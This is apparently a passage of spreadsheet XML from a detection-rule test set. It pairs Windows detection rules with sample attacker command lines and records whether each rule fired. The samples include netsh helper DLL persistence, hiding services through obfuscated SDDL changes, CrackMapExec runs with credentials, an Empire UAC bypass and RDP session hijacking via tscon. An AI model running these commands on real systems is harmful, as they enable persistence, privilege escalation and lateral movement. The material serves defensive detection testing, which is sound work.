      </c>
      <c r="C352" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D352" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E352" s="43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F352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I352" s="43" t="n"/>
      <c r="J352" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K352" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="353" ht="15.75" customHeight="1" s="42">
      <c r="A353" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B353" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C353" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D353" s="43" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E353" s="43" t="inlineStr">
        <is>
          <t>copy netsh.exe not_netsh.exe &amp;&amp; not_netsh.exe add helper evil.dll</t>
        </is>
      </c>
      <c r="F353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I353" s="43" t="n"/>
      <c r="J353" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K353" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="354" ht="15.75" customHeight="1" s="42">
      <c r="A354" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B354" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C354" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D354" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E354" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -sd 'DCLCWPDTSD'"</t>
        </is>
      </c>
      <c r="F354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I354" s="43" t="n"/>
      <c r="J354" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K354" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="355" ht="15.75" customHeight="1" s="42">
      <c r="A355" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B355" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C355" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D355" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E355" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl 'DCLCWPDTSD'"</t>
        </is>
      </c>
      <c r="F355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I355" s="43" t="n"/>
      <c r="J355" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K355" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="356" ht="15.75" customHeight="1" s="42">
      <c r="A356" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B356" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C356" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D356" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E356" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl ('DCLCW'+'PDTSD')"</t>
        </is>
      </c>
      <c r="F356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I356" s="43" t="n"/>
      <c r="J356" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K356" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="357" ht="15.75" customHeight="1" s="42">
      <c r="A357" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B357" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C357" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D357" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E357" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl (([char[]]'DSTDPWCLCD' | ForEach-Object { $_ }) -join '' -replace 'DSTDPWCLCD','DCLCWPDTSD')"</t>
        </is>
      </c>
      <c r="F357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I357" s="43" t="n"/>
      <c r="J357" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K357" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="358" ht="15.75" customHeight="1" s="42">
      <c r="A358" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B358" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C358" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D358" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E358" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl $env:SDDL"</t>
        </is>
      </c>
      <c r="F358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H358" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I358" s="43" t="n"/>
      <c r="J358" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K358" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="359" ht="15.75" customHeight="1" s="42">
      <c r="A359" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B359" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C359" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D359" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E359" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl $([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('RExMQ0NQVFBETlNERT0=')))"</t>
        </is>
      </c>
      <c r="F359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I359" s="43" t="n"/>
      <c r="J359" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K359" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="360" ht="15.75" customHeight="1" s="42">
      <c r="A360" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B360" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C360" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D360" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E360" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename "cmd.exe" /RunAs 4 /WindowState 0 /Run</t>
        </is>
      </c>
      <c r="F360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I360" s="43" t="n"/>
      <c r="J360" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K360" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="361" ht="15.75" customHeight="1" s="42">
      <c r="A361" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B361" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C361" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D361" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E361" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename cmd.exe /RunAs 8 /Run</t>
        </is>
      </c>
      <c r="F361" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G361" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H361" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I361" s="43" t="n"/>
      <c r="J361" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K361" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="362" ht="15.75" customHeight="1" s="42">
      <c r="A362" s="43" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B362" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C362" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D362" s="43" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E362" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\RUNDLL32.EXE" -localserver "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"</t>
        </is>
      </c>
      <c r="F362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I362" s="43" t="n"/>
      <c r="J362" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K362" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="363" ht="15.75" customHeight="1" s="42">
      <c r="A363" s="43" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B363" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C363" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D363" s="43" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E363" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\RUNDLL32.EXE" -sta "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"</t>
        </is>
      </c>
      <c r="F363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H363" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I363" s="43" t="n"/>
      <c r="J363" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K363" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="364" ht="15.75" customHeight="1" s="42">
      <c r="A364" s="43" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B364" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C364" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D364" s="43" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E364" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\RUNDLL32.EXE" "/sta" "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"</t>
        </is>
      </c>
      <c r="F364" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G364" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H364" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I364" s="43" t="n"/>
      <c r="J364" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K364" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="365" ht="15.75" customHeight="1" s="42">
      <c r="A365" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B365" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C365" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D365" s="43" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E365" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NonI -WindowStyle Hidden -NoProfile -Command '$x=$((gp HKCU:\Software\Microsoft\Windows\Update).Update)'</t>
        </is>
      </c>
      <c r="F365" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G365" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H365" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I365" s="43" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag (534f2ef7-e8a2-4433-816d-c91bccde289b)</t>
        </is>
      </c>
      <c r="J365" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K365" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="366" ht="15.75" customHeight="1" s="42">
      <c r="A366" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B366" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C366" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D366" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E366" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.100 --local-auth --username Administrator --password "P@ssw0rd123!" -x whoami</t>
        </is>
      </c>
      <c r="F366" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G366" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H366" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I366" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J366" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K366" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="367" ht="15.75" customHeight="1" s="42">
      <c r="A367" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B367" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C367" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D367" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E367" s="43" t="inlineStr">
        <is>
          <t>cme.exe</t>
        </is>
      </c>
      <c r="F367" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G367" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H367" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I367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67" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K367" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="368" ht="15.75" customHeight="1" s="42">
      <c r="A368" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B368" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C368" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D368" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E368" s="43" t="inlineStr">
        <is>
          <t>cme smb 172.16.10.5/24 -u 'user' -p 'pass' --local-auth</t>
        </is>
      </c>
      <c r="F368" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G368" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H368" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I368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68" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K368" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="369" ht="15.75" customHeight="1" s="42">
      <c r="A369" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B369" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C369" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D369" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E369" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.0/24 -u"Administrator" -p"Password123!" --local-auth -x"whoami"</t>
        </is>
      </c>
      <c r="F369" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G369" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H369" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I369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69" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K369" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="370" ht="15.75" customHeight="1" s="42">
      <c r="A370" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B370" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C370" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D370" s="43" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E370" s="43" t="inlineStr">
        <is>
          <t>netsh.exe add helper "C:\AtomicRedTeam\atomics\T1546.007\bin\NetshHelper.dll"</t>
        </is>
      </c>
      <c r="F370" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G370" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H370" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I370" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL (56321594-9087-49d9-bf10-524fe8479452)</t>
        </is>
      </c>
      <c r="J370" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K370" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="371" ht="15.75" customHeight="1" s="42">
      <c r="A371" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B371" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C371" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D371" s="43" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E371" s="43" t="inlineStr">
        <is>
          <t>netsh.exe  add helper "C:\AtomicRedTeam\atomics\T1546.007\bin\NetshHelper.dll"</t>
        </is>
      </c>
      <c r="F371" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I371" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL (56321594-9087-49d9-bf10-524fe8479452)</t>
        </is>
      </c>
      <c r="J371" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K371" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="372" ht="15.75" customHeight="1" s="42">
      <c r="A372" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B372" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C372" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D372" s="43" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E372" s="43" t="inlineStr">
        <is>
          <t>netsh add	helper evil.dll</t>
        </is>
      </c>
      <c r="F372" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G372" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H372" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I372" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL (56321594-9087-49d9-bf10-524fe8479452)</t>
        </is>
      </c>
      <c r="J372" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K372" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="373" ht="15.75" customHeight="1" s="42">
      <c r="A373" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B373" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C373" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D373" s="43" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E373" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -Name 'TestService' -BinaryPathName 'cmd.exe' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F373" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G373" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H373" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I373" s="4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373" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K373" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="374" ht="15.75" customHeight="1" s="42">
      <c r="A374" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B374" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C374" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D374" s="43" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E374" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -BinaryPathName 'cmd.exe' -Name 'TestService' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F374" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G374" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H374" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I374" s="4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374" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K374" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="375" ht="15.75" customHeight="1" s="42">
      <c r="A375" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B375" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C375" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D375" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E375" s="43" t="inlineStr">
        <is>
          <t>sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto</t>
        </is>
      </c>
      <c r="F375" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G375" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H375" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I375" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J375" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K375" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="376" ht="15.75" customHeight="1" s="42">
      <c r="A376" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B376" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C376" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D376" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E376" s="43" t="inlineStr">
        <is>
          <t>sc.exe create AtomicTestService_CMD binPath= "C:\AtomicRedTeam\atomics\T1543.003\bin\AtomicService.exe" start=auto type=Own</t>
        </is>
      </c>
      <c r="F376" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G376" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H376" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I376" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J376" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K376" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="377" ht="15.75" customHeight="1" s="42">
      <c r="A377" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B377" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C377" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D377" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E377" s="43" t="inlineStr">
        <is>
          <t>sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"</t>
        </is>
      </c>
      <c r="F377" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G377" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H377" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I377" s="43" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); Suspicious RDP Redirect Using TSCON (f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb); Suspicious RDP Redirect Using TSCON (f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J377" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K377" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="378" ht="15.75" customHeight="1" s="42">
      <c r="A378" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B378" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C378" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D378" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E378" s="43" t="inlineStr">
        <is>
          <t>sc.exe create AtomicService binPath= "C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F378" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G378" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H378" s="43" t="b">
        <v>0</v>
